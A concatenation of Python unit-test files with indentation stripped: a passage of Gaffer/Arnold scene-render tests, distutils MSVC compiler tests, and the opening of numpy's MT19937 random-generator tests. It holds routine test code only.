set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions(), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.registerAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightAndShadowLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
arnoldAttributes = GafferArnold.ArnoldAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
group["in"].addChild( GafferScene.ScenePlug( "in1" ) )
group["in"].addChild( GafferScene.ScenePlug( "in2" ) )
group["in"].addChild( GafferScene.ScenePlug( "in3" ) )
group["in"].addChild( GafferScene.ScenePlug( "in4" ) )
evaluate = GafferScene.EvaluateLightLinks()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
arnoldAttributes["in"].setInput( attributes["out"] )
group["in"]["in1"].setInput( arnoldAttributes["out"] )
group["in"]["in2"].setInput( light1["out"] )
group["in"]["in3"].setInput( light2["out"] )
group["in"]["in4"].setInput( sphere2["out"] )
evaluate["in"].setInput( group["out"] )
render["in"].setInput( evaluate["out"] )
# Illumination
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light /group/light1" )
# Shadows
arnoldAttributes["attributes"]["shadowGroup"]["enabled"].setValue( True )
arnoldAttributes["attributes"]["shadowGroup"]["value"].setValue( "/group/light /group/light1" )
# make sure we pass correct data into the renderer
self.assertEqual(
set( render["in"].attributes( "/group/sphere" )["linkedLights"] ),
set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
)
self.assertEqual(
set( render["in"].attributes( "/group/sphere" )["ai:visibility:shadow_group"] ),
set( IECore.StringVectorData( ["/group/light", "/group/light1"] ) )
)
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
# check illumination
lights = arnold.AiNodeGetArray( sphere, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere, "use_light_group" )
self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
self.assertEqual( doLinking, True )
# check shadows
shadows = arnold.AiNodeGetArray( sphere, "shadow_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( shadows.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(shadows, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere, "use_shadow_group" )
self.assertEqual( set( lightNames ), { "light:/group/light", "light:/group/light1" } )
self.assertEqual( doLinking, True )
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( "/group/sphere1" )
# check illumination
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( lights.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(lights, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere1, "use_light_group" )
self.assertEqual( lightNames, [] )
self.assertEqual( doLinking, False )
# check shadows
shadows = arnold.AiNodeGetArray( sphere1, "shadow_group" )
lightNames = []
for i in range( arnold.AiArrayGetNumElements( shadows.contents ) ):
light = arnold.cast(arnold.AiArrayGetPtr(shadows, i), arnold.POINTER(arnold.AtNode))
lightNames.append( arnold.AiNodeGetName(light.contents) )
doLinking = arnold.AiNodeGetBool( sphere1, "use_shadow_group" )
self.assertEqual( lightNames, [] )
self.assertEqual( doLinking, False )
def testNoLinkedLightsOnLights( self ) :
sphere = GafferScene.Sphere()
meshLightShader = GafferArnold.ArnoldShader()
meshLightShader.loadShader( "flat" )
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( sphere["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
meshLight["parameters"]["color"].setInput( meshLightShader["out"] )
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
# Trigger light linking by unlinking a light
light2["defaultLight"].setValue( False )
group = GafferScene.Group()
group["in"][0].setInput( meshLight["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightFilters( self ) :
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["lightFilter"]["out"] )
s["attributes"]["attributes"]["filteredLights"]["enabled"].setValue( True )
s["attributes"]["attributes"]["filteredLights"]["value"].setValue( "defaultLights" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["light"]["out"] )
s["assignment"]["shader"].setInput( s["gobo"]["out"] )
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["attributes"]["out"] )
s["group"]["in"][1].setInput( s["assignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
arnold.AiASSLoad( self.temporaryDirectory() + "/test.ass" )
light = arnold.AiNodeLookUpByName( "light:/group/light" )
linkedFilters = arnold.AiNodeGetArray( light, "filters" )
numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )
self.assertEqual( numFilters, 2 )
linkedFilter = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 0), arnold.POINTER(arnold.AtNode))
linkedGobo = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 1), arnold.POINTER(arnold.AtNode))
self.assertEqual( arnold.AiNodeGetName( linkedFilter ), "lightFilter:/group/lightFilter" )
# We don't care about the exact name of the gobo which contains a hash
goboName = arnold.AiNodeGetName( linkedGobo )
self.assertTrue( goboName.startswith( "shader:" ) and goboName.endswith( ":gobo" ) )
def testLightFiltersMany( self ) :
# \todo: this can easily be turned into a performance test
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["lightFilter"]["filteredLights"].setValue( "defaultLights" )
s["planeFilters"] = GafferScene.Plane( "Plane" )
s["planeFilters"]["divisions"].setValue( imath.V2i( 9 ) )
s["instancerFilters"] = GafferScene.Instancer( "Instancer" )
s["instancerFilters"]["in"].setInput( s["planeFilters"]["out"] )
s["instancerFilters"]["instances"].setInput( s["lightFilter"]["out"] )
s["instancerFilters"]["parent"].setValue( "/plane" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["planeLights"] = GafferScene.Plane( "Plane" )
s["planeLights"]["divisions"].setValue( imath.V2i( 9 ) )
s["instancerLights"] = GafferScene.Instancer( "Instancer" )
s["instancerLights"]["in"].setInput( s["planeLights"]["out"] )
s["instancerLights"]["instances"].setInput( s["light"]["out"] )
s["instancerLights"]["parent"].setValue( "/plane" )
s["group"] = GafferScene.Group( "Group" )
s["group"]["in"][0].setInput( s["instancerFilters"]["out"] )
s["group"]["in"][1].setInput( s["instancerLights"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/testMany.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) :
foo = self.temporaryDirectory() + "/testMany.ass"
print foo
arnold.AiASSLoad( foo )
for i in range( 100 ) :
light = arnold.AiNodeLookUpByName( "light:/group/plane1/instances/light/%s" % i )
linkedFilters = arnold.AiNodeGetArray( light, "filters" )
numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )
self.assertEqual( numFilters, 100 )
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
self.assertRaisesRegexp( RuntimeError, "Render aborted", s["render"]["task"].execute )
def testOSLShaders( self ) :
swizzle = GafferOSL.OSLShader()
swizzle.loadShader( "MaterialX/mx_swizzle_color_float" )
swizzle["parameters"]["in"].setValue( imath.Color3f( 0, 0, 1 ) )
swizzle["parameters"]["channels"].setValue( "b" )
pack = GafferOSL.OSLShader()
pack.loadShader( "MaterialX/mx_pack_color" )
pack["parameters"]["in1"].setInput( swizzle["out"]["out"] )
ball = GafferArnold.ArnoldShaderBall()
ball["shader"].setInput( pack["out"] )
outputs = GafferScene.Outputs()
outputs.addOutput(
"beauty",
IECoreScene.Output(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ImageDisplayDriver",
"handle" : "myLovelySphere",
}
)
)
outputs["in"].setInput( ball["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( outputs["out"] )
render["task"].execute()
image = IECoreImage.ImageDisplayDriver.storedImage( "myLovelySphere" )
self.assertTrue( isinstance( image, IECoreImage.ImagePrimitive ) )
self.assertEqual( self.__color4fAtUV( image, imath.V2f( 0.5 ) ), imath.Color4f( 1, 0, 0, 1 ) )
def __color4fAtUV( self, image, uv ) :
objectToImage = GafferImage.ObjectToImage()
objectToImage["object"].setValue( image )
sampler = GafferImage.ImageSampler()
sampler["image"].setInput( objectToImage["out"] )
sampler["pixel"].setValue(
uv * imath.V2f(
image.displayWindow.size().x,
image.displayWindow.size().y
)
)
return sampler["color"].getValue()
def __arrayToSet( self, a ) :
result = set()
for i in range( 0, arnold.AiArrayGetNumElements( a.contents ) ) :
if arnold.AiArrayGetType( a.contents ) == arnold.AI_TYPE_STRING :
result.add( arnold.AiArrayGetStr( a, i ) )
else :
raise TypeError
return result
if __name__ == "__main__":
unittest.main()
|
test_msvccompiler.py | """Tests for distutils._msvccompiler."""
import sys
import unittest
import os
import threading
from distutils.errors import DistutilsPlatformError
from distutils.tests import support
from test.support import run_unittest
SKIP_MESSAGE = (None if sys.platform == "win32" else
"These tests are only for win32")
@unittest.skipUnless(SKIP_MESSAGE is None, SKIP_MESSAGE)
class msvccompilerTestCase(support.TempdirManager,
unittest.TestCase):
def test_no_compiler(self):
import distutils._msvccompiler as _msvccompiler
# makes sure query_vcvarsall raises
# a DistutilsPlatformError if the compiler
# is not found
def _find_vcvarsall(plat_spec):
return None, None
old_find_vcvarsall = _msvccompiler._find_vcvarsall
_msvccompiler._find_vcvarsall = _find_vcvarsall
try:
self.assertRaises(DistutilsPlatformError,
_msvccompiler._get_vc_env,
'wont find this version')
finally:
_msvccompiler._find_vcvarsall = old_find_vcvarsall
def test_get_vc_env_unicode(self):
import distutils._msvccompiler as _msvccompiler
test_var = 'ṰḖṤṪ┅ṼẨṜ'
test_value = '₃⁴₅'
# Ensure we don't early exit from _get_vc_env
old_distutils_use_sdk = os.environ.pop('DISTUTILS_USE_SDK', None)
os.environ[test_var] = test_value
try:
env = _msvccompiler._get_vc_env('x86')
self.assertIn(test_var.lower(), env)
self.assertEqual(test_value, env[test_var.lower()])
finally:
os.environ.pop(test_var)
if old_distutils_use_sdk:
os.environ['DISTUTILS_USE_SDK'] = old_distutils_use_sdk
def test_get_vc2017(self):
import distutils._msvccompiler as _msvccompiler
# This function cannot be mocked, so pass it if we find VS 2017
# and mark it skipped if we do not.
version, path = _msvccompiler._find_vc2017()
if version:
self.assertGreaterEqual(version, 15)
self.assertTrue(os.path.isdir(path))
else:
raise unittest.SkipTest("VS 2017 is not installed")
def test_get_vc2015(self):
import distutils._msvccompiler as _msvccompiler
# This function cannot be mocked, so pass it if we find VS 2015
# and mark it skipped if we do not.
version, path = _msvccompiler._find_vc2015()
if version:
self.assertGreaterEqual(version, 14)
self.assertTrue(os.path.isdir(path))
else:
raise unittest.SkipTest("VS 2015 is not installed")
class CheckThread(threading.Thread):
exc_info = None
def run(self):
try:
super().run()
except Exception:
self.exc_info = sys.exc_info()
def __bool__(self):
return not self.exc_info
class TestSpawn(unittest.TestCase):
def test_concurrent_safe(self):
"""
Concurrent calls to spawn should have consistent results.
"""
import distutils._msvccompiler as _msvccompiler
compiler = _msvccompiler.MSVCCompiler()
compiler._paths = "expected"
inner_cmd = 'import os; assert os.environ["PATH"] == "expected"'
command = ['python', '-c', inner_cmd]
threads = [
CheckThread(target=compiler.spawn, args=[command])
for n in range(100)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert all(threads)
def test_suite():
return unittest.makeSuite(msvccompilerTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
|
test_generator_mt19937.py | import sys
import hashlib
import pytest
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_, assert_raises, assert_equal, assert_allclose,
assert_warns, assert_no_warnings, assert_array_equal,
assert_array_almost_equal, suppress_warnings)
from numpy.random import Generator, MT19937, SeedSequence
random = Generator(MT19937())
JUMP_TEST_DATA = [
{
"seed": 0,
"steps": 10,
"initial": {"key_sha256": "bb1636883c2707b51c5b7fc26c6927af4430f2e0785a8c7bc886337f919f9edf", "pos": 9},
"jumped": {"key_sha256": "ff682ac12bb140f2d72fba8d3506cf4e46817a0db27aae1683867629031d8d55", "pos": 598},
},
{
"seed":384908324,
"steps":312,
"initial": {"key_sha256": "16b791a1e04886ccbbb4d448d6ff791267dc458ae599475d08d5cced29d11614", "pos": 311},
"jumped": {"key_sha256": "a0110a2cf23b56be0feaed8f787a7fc84bef0cb5623003d75b26bdfa1c18002c", "pos": 276},
},
{
"seed": [839438204, 980239840, 859048019, 821],
"steps": 511,
"initial": {"key_sha256": "d306cf01314d51bd37892d874308200951a35265ede54d200f1e065004c3e9ea", "pos": 510},
"jumped": {"key_sha256": "0e00ab449f01a5195a83b4aee0dfbc2ce8d46466a640b92e33977d2e42f777f8", "pos": 475},
},
]
@pytest.fixture(scope='module', params=[True, False])
def endpoint(request):
return request.param
class TestSeed:
def test_scalar(self):
s = Generator(MT19937(0))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937(4294967295))
assert_equal(s.integers(1000), 324)
def test_array(self):
s = Generator(MT19937(range(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937(np.arange(10)))
assert_equal(s.integers(1000), 465)
s = Generator(MT19937([0]))
assert_equal(s.integers(1000), 479)
s = Generator(MT19937([4294967295]))
assert_equal(s.integers(1000), 324)
def test_seedsequence(self):
s = MT19937(SeedSequence(0))
assert_equal(s.random_raw(1), 2058676884)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5)
assert_raises(ValueError, MT19937, -1)
def test_invalid_array(self):
# seed must be an unsigned integer
assert_raises(TypeError, MT19937, [-0.5])
assert_raises(ValueError, MT19937, [-1])
assert_raises(ValueError, MT19937, [1, -2, 4294967296])
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial:
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype='int')
for p in [0, .5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial:
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape,
(2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p,
float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_non_contiguous(self):
p = np.arange(15.)
p /= np.sum(p[1::3])
pvals = p[1::3]
random = Generator(MT19937(1432985819))
non_contig = random.multinomial(100, pvals=pvals)
random = Generator(MT19937(1432985819))
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_multidimensional_pvals(self):
assert_raises(ValueError, random.multinomial, 10, [[0, 1]])
assert_raises(ValueError, random.multinomial, 10, [[0], [1]])
assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]])
assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]]))
class TestMultivariateHypergeometric:
def setup(self):
self.seed = 8675309
def test_argument_validation(self):
# Error cases...
# `colors` must be a 1-d sequence
assert_raises(ValueError, random.multivariate_hypergeometric,
10, 4)
# Negative nsample
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], -1)
# Negative color
assert_raises(ValueError, random.multivariate_hypergeometric,
[-1, 2, 3], 2)
# nsample exceeds sum(colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[2, 3, 4], 10)
# nsample exceeds sum(colors) (edge case of empty colors)
assert_raises(ValueError, random.multivariate_hypergeometric,
[], 1)
# Validation errors associated with very large values in colors.
assert_raises(ValueError, random.multivariate_hypergeometric,
[999999999, 101], 5, 1, 'marginals')
int64_info = np.iinfo(np.int64)
max_int64 = int64_info.max
max_int64_index = max_int64 // int64_info.dtype.itemsize
assert_raises(ValueError, random.multivariate_hypergeometric,
[max_int64_index - 100, 101], 5, 1, 'count')
@pytest.mark.parametrize('method', ['count', 'marginals'])
def test_edge_cases(self, method):
# Set the seed, but in fact, all the results in this test are
# deterministic, so we don't really need this.
random = Generator(MT19937(self.seed))
x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([], 0, method=method)
assert_array_equal(x, [])
x = random.multivariate_hypergeometric([], 0, size=1, method=method)
assert_array_equal(x, np.empty((1, 0), dtype=np.int64))
x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method)
assert_array_equal(x, [0, 0, 0])
x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method)
assert_array_equal(x, [3, 0, 0])
colors = [1, 1, 0, 1, 1]
x = random.multivariate_hypergeometric(colors, sum(colors),
method=method)
assert_array_equal(x, colors)
x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3,
method=method)
assert_array_equal(x, [[3, 4, 5]]*3)
# Cases for nsample:
# nsample < 10
# 10 <= nsample < colors.sum()/2
# colors.sum()/2 < nsample < colors.sum() - 10
# colors.sum() - 10 < nsample < colors.sum()
@pytest.mark.parametrize('nsample', [8, 25, 45, 55])
@pytest.mark.parametrize('method', ['count', 'marginals'])
@pytest.mark.parametrize('size', [5, (2, 3), 150000])
def test_typical_cases(self, nsample, method, size):
random = Generator(MT19937(self.seed))
colors = np.array([10, 5, 20, 25])
sample = random.multivariate_hypergeometric(colors, nsample, size,
method=method)
if isinstance(size, int):
expected_shape = (size,) + colors.shape
else:
expected_shape = size + colors.shape
assert_equal(sample.shape, expected_shape)
assert_((sample >= 0).all())
assert_((sample <= colors).all())
assert_array_equal(sample.sum(axis=-1),
np.full(size, fill_value=nsample, dtype=int))
if isinstance(size, int) and size >= 100000:
# This sample is large enough to compare its mean to
# the expected values.
assert_allclose(sample.mean(axis=0),
nsample * colors / colors.sum(),
rtol=1e-3, atol=0.005)
def test_repeatability1(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5,
method='count')
expected = np.array([[2, 1, 2],
[2, 1, 2],
[1, 1, 3],
[2, 0, 3],
[2, 1, 2]])
assert_array_equal(sample, expected)
def test_repeatability2(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 50,
size=5,
method='marginals')
expected = np.array([[ 9, 17, 24],
[ 7, 13, 30],
[ 9, 15, 26],
[ 9, 17, 24],
[12, 14, 24]])
assert_array_equal(sample, expected)
def test_repeatability3(self):
random = Generator(MT19937(self.seed))
sample = random.multivariate_hypergeometric([20, 30, 50], 12,
size=5,
method='marginals')
expected = np.array([[2, 3, 7],
[5, 3, 4],
[2, 5, 5],
[5, 3, 4],
[1, 5, 6]])
assert_array_equal(sample, expected)
class TestSetState:
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (self.state['bit_generator'],
self.state['state']['key'],
self.state['state']['pos'])
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers:
rfunc = random.integers
# valid integer/boolean types
itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
np.int32, np.uint32, np.int64, np.uint64]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, lbnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint,
dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [ubnd], [lbnd],
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, 1, [0],
endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [lbnd] * 2,
[ubnd + 1] * 2, endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2,
endpoint=endpoint, dtype=dt)
assert_raises(ValueError, self.rfunc, [1] * 2, 0,
endpoint=endpoint, dtype=dt)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(self.rfunc(tgt, tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
assert_equal(self.rfunc([tgt], tgt + is_open, size=1000,
endpoint=endpoint, dtype=dt), tgt)
